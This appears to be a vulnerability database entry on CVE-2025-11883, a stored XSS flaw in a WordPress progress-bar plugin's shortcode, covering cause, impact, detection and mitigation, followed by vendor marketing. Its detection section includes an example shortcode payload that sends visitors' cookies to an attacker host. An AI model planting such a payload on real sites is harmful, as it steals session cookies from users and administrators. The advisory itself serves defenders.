
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-11883 is a Stored Cross-Site Scripting (XSS) vulnerability in the Responsive Progress Bar plugin for WordPress, affecting versions 1.0 and earlier. The flaw arises from insufficient input sanitization and output escaping on user-supplied attributes within the plugin's rprogress shortcode. It was published on October 22, 2025, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerability exists at line 64 of responsive-progress-bar.php, where user-supplied shortcode attributes are rendered without proper sanitization or escaping (Plugin Source). An authenticated attacker with at least contributor-level access can embed malicious JavaScript within the rprogress shortcode on any page or post; the script executes in the browser of any user who subsequently visits the affected page. No special configuration is required beyond having the plugin active and contributor-level (or higher) WordPress credentials.
Successful exploitation allows an attacker to inject and persistently store arbitrary JavaScript that executes in the context of other users' browsers, including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions, defacement, or redirection to malicious sites. The scope is changed (S:C in CVSS), meaning the injected script can affect resources beyond the plugin itself, with low confidentiality and integrity impact and no direct availability impact (Wordfence).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the available data. The vulnerability requires authenticated access at contributor level or above, which limits the attack surface compared to unauthenticated flaws. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
/wp-content/plugins/responsive-progress-bar/ directory.rprogress shortcode with a malicious attribute payload, e.g., [rprogress attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints containing rprogress shortcode with encoded script tags or JavaScript event handlers in the request body.<script> tags or JavaScript payloads stored in the wp_posts table within post content fields containing [rprogress shortcode entries.rprogress shortcode, potentially carrying cookie or session data in query parameters.wp-content/plugins/responsive-progress-bar/responsive-progress-bar.php for unauthorized modifications.The Responsive Progress Bar plugin version 1.0 is the last known vulnerable version; site administrators should check the WordPress plugin repository for any updated release that addresses this issue. If no patched version is available, the recommended workaround is to deactivate and remove the plugin until a fix is released. Additionally, restrict contributor-level account creation and review existing contributor accounts for unauthorized access (Wordfence, WordPress Plugin).
Wordfence disclosed and reported this vulnerability, including it in their weekly WordPress vulnerability report for October 20–26, 2025 (Wordfence Blog). No significant broader media coverage, researcher commentary, or notable social media discussion has been identified for this CVE beyond standard vulnerability aggregator listings.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."